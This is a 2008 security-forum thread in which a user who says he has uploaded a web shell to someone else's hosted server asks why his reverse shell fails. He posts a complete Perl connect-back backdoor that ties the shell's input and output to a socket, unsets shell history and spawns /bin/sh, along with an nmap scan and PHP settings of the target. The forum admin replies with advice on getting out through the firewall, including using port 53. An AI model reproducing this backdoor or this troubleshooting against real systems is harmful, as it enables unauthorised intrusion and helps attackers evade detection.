|
Menu |
|
|
Home |
| |
|
Discussions |
| |
|
Tools |
| |
|
Affiliates |
| |
|
Content |
| |
|
Info |
| | |
|
|
|
|
|
User Info |
|
Membership:
Latest: MichaelSnaRe
New Today: 0
New Yesterday: 0
Overall: 9144
People Online:
Visitors: 101
Members: 0
Total: 101
|
|
|
|
|
|
Full disclosure |
|
|
|
|
|
|
|
|
|
IT Security and Insecurity Portal |
|
|
Need HELP, perl reverse shell ..... |
|
Posted: Sun Nov 23, 2008 1:33 pm |
|
|
hottox |
Regular user |
|
|
Joined: Nov 23, 2008 |
Posts: 19 |
|
|
|
|
|
|
|
Hi everybody,
so, this is my probleme, i uploaded a shell on a server, then i uploaded a perl backdoor "chmod 0755",
script:
Code: | #!/usr/bin/perl
use IO::Socket;
#cONNECT BACKDOOR EDITED BY XORON
#lord@SlackwareLinux:/home/programing$ perl dc.pl
#--== ConnectBack Backdoor Shell vs 1.0 by LorD of IRAN HACKERS SABOTAGE ==--
#
#Usage: dc.pl [Host] [Port]
#
#Ex: dc.pl 127.0.0.1 2121
#lord@SlackwareLinux:/home/programing$ perl dc.pl 127.0.0.1 2121
#--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==--
#
#[*] Resolving HostName
#[*] Connecting... 127.0.0.1
#[*] Spawning Shell
#[*] Connected to remote host
#bash-2.05b# nc -vv -l -p 2121
#listening on [any] 2121 ...
#connect to [127.0.0.1] from localhost [127.0.0.1] 32769
#--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==--
#
#--==Systeminfo==--
#Linux SlackwareLinux 2.6.7 #1 SMP Thu Dec 23 00:05:39 IRT 2004 i686 unknown unknown GNU/Linux
#
#--==Userinfo==--
#uid=1001(xoron) gid=100(users) groups=100(users)
#
#--==Directory==--
#/root
#
#--==Shell==--
#
$system = '/bin/sh';
$ARGC=@ARGV;
print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n";
if ($ARGC!=2) {
print "Usage: $0 [Host] [Port] \n\n";
die "Ex: $0 127.0.0.1 2121 \n";
}
use Socket;
use FileHandle;
socket(SOCKET, PF_INET, SOCK_STREAM, getprotobyname('tcp')) or die print "[-] Unable to Resolve Host\n";
connect(SOCKET, sockaddr_in($ARGV[1], inet_aton($ARGV[0]))) or die print "[-] Unable to Connect Host\n";
print "[*] Resolving HostName\n";
print "[*] Connecting... $ARGV[0] \n";
print "[*] Spawning Shell \n";
print "[*] Connected to remote host \n";
SOCKET->autoflush();
open(STDIN, ">&SOCKET");
open(STDOUT,">&SOCKET");
open(STDERR,">&SOCKET");
print "--== ConnectBack Backdoor Shell EDITED BY XORON TURK?SH HACKER ==-- \n\n";
system("unset HISTFILE; unset SAVEHIST;echo --==Systeminfo==--; uname -a;echo;
echo --==Userinfo==--; id;echo;echo --==Directory==--; pwd;echo; echo --==Shell==-- ");
system($system);
#EOF
|
i run netcat:
then, via the php shell:
Code: | perl dc.pl [My ip] [port] |
and the result : Unable to Connect Host.
I tested the script on the localhost and I had a shell,
i need your help to solve that problem.
Waiting for reply |
|
|
|
|
|
|
|
|
Posted: Sun Nov 23, 2008 1:51 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
This can be firewalling issue on webserver's side. Try common ports like 53,80, ...
And are you sure that your port 2121 is open on your side? No firewall? No router/NAT between? Maybe you need port forward. I suggest to run NC in listening mode on your PC and then use some online port scanner and see, if your open port is reachable from the Internet. |
|
|
|
|
|
|
|
|
Posted: Sun Nov 23, 2008 2:00 pm |
|
|
hottox |
Regular user |
|
|
Joined: Nov 23, 2008 |
Posts: 19 |
|
|
|
|
|
|
|
here is the result of Intense scan, all TCP ports,with nmap:
Code: | PORT STATE SERVICE VERSION
20/tcp closed ftp-data
21/tcp open ftp PureFTPd
|_ FTP bounce check: no banner
22/tcp open ssh OpenSSH 3.9p1 (protocol 2.0)
25/tcp open smtp Exim smtpd 4.69
26/tcp open smtp Exim smtpd 4.69
53/tcp closed domain
80/tcp open http Apache httpd 2.2.9 ((Unix) mod_ssl/2.2.9 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635)
|_ HTML title: HostMonster - Web hosting
110/tcp open pop3 Dovecot pop3d
|_ POP3 Capabilites: USER CAPA RESP-CODES UIDL PIPELINING STLS TOP SASL(PLAIN)
113/tcp closed auth
143/tcp open imap Dovecot imapd
443/tcp open ssl/http Apache httpd 2.2.9 ((Unix) mod_ssl/2.2.9 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635)
465/tcp open ssl/smtp Exim smtpd 4.69
|_ SSLv2: server still supports SSLv2
993/tcp open ssl/imap Dovecot imapd
|_ SSLv2: server still supports SSLv2
995/tcp open ssl/pop3 Dovecot pop3d
|_ SSLv2: server still supports SSLv2
1167/tcp closed unknown
2077/tcp open unknown
2078/tcp open ssl/unknown
|_ SSLv2: server still supports SSLv2
2082/tcp open http cPanel httpd 11.23.6
| HTTP Auth: HTTP Service requires authentication
|_ Auth type: Basic, realm = cPanel
|_ HTML title: cPanel® 11
2083/tcp open ssl/http cPanel httpd 11.23.6
|_ SSLv2: server still supports SSLv2
|_ HTML title: cPanel® 11
| HTTP Auth: HTTP Service requires authentication
|_ Auth type: Basic, realm = cPanel
2084/tcp open http cPanel EntropyChat httpd 0.2.6
|_ HTML title: Site doesn't have a title.
|_ robots.txt: is empty or has no disallowed entries
2085/tcp closed unknown
2086/tcp open http cPanel httpd 11.23.6
|_ HTML title: cPanel® 11
| HTTP Auth: HTTP Service requires authentication
|_ Auth type: Basic, realm = Web Host Manager
2087/tcp open ssl/http cPanel httpd 11.23.6
|_ SSLv2: server still supports SSLv2
|_ HTML title: cPanel® 11
| HTTP Auth: HTTP Service requires authentication
|_ Auth type: Basic, realm = Web Host Manager
2088/tcp closed unknown
2089/tcp closed unknown
2090/tcp closed unknown
2091/tcp closed unknown
2092/tcp closed unknown
2093/tcp closed unknown
2094/tcp closed unknown
2095/tcp open http cPanel httpd 11.23.6
|_ HTML title: cPanel® 11
| HTTP Auth: HTTP Service requires authentication
|_ Auth type: Basic, realm = WebMail
2096/tcp open ssl/http cPanel httpd 11.23.6
|_ SSLv2: server still supports SSLv2
|_ HTML title: cPanel® 11
| HTTP Auth: HTTP Service requires authentication
|_ Auth type: Basic, realm = WebMail
2097/tcp closed unknown
6666/tcp closed irc
8082/tcp closed blackice-alerts
8083/tcp closed unknown
8585/tcp closed unknown
8586/tcp closed unknown
19638/tcp closed unknown |
|
|
|
|
|
|
|
|
|
Posted: Sun Nov 23, 2008 2:14 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
|
|
|
|
Posted: Sun Nov 23, 2008 2:28 pm |
|
|
hottox |
Regular user |
|
|
Joined: Nov 23, 2008 |
Posts: 19 |
|
|
|
|
|
|
|
it's the target's scan,
port is open, and the firewall is disabled, |
|
|
|
|
Posted: Sun Nov 23, 2008 2:35 pm |
|
|
waraxe |
Site admin |
|
|
Joined: May 11, 2004 |
Posts: 2407 |
Location: Estonia, Tartu |
|
|
|
|
|
|
If you are sure, that your PC can be reached from Internet, then try to use TCP port 53 instead of 2121. Because webserver needs this port for outgoing DNS requests, then it may be useable for your intentions. That's if target's network-level security is not tighter. |
|
|
|
|
Posted: Sun Nov 23, 2008 3:13 pm |
|
|
hottox |
Regular user |
|
|
Joined: Nov 23, 2008 |
Posts: 19 |
|
|
|
|
|
|
|
here is some information about the target:
Software: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.8i DAV/2 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635. PHP/5.2.6
Code: | System Info: Linux 2.6.27-6_1.intel.BHsmp #1 SMP Thu Nov 13 15:27:29 MST 2008
x86_64
Disabled functions: NONE
cURL: ON
Register globals: OFF
MySQL: ON
MSSQL: OFF
PostgreSQL: ON
Oracle: OFF
Safe-mode: OFF (not secure) |
[/code]
?????????????????????? |
|
|
|
|
www.waraxe.us Forum Index -> Newbies corner
You cannot post new topics in this forum You cannot reply to topics in this forum You cannot edit your posts in this forum You cannot delete your posts in this forum You cannot vote in polls in this forum
|
All times are GMT
Page 1 of 1
|
|
|
Powered by phpBB © 2001-2008 phpBB Group
|
|
|
|
|
|